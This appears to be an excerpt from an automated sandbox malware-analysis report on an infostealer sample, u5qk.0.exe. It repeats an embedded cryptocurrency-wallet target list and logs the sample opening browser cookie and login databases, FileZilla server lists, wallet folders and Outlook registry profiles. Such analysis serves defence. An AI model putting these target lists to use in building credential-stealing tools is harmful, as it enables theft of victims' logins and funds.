                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                              Source: Yara matchFile source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
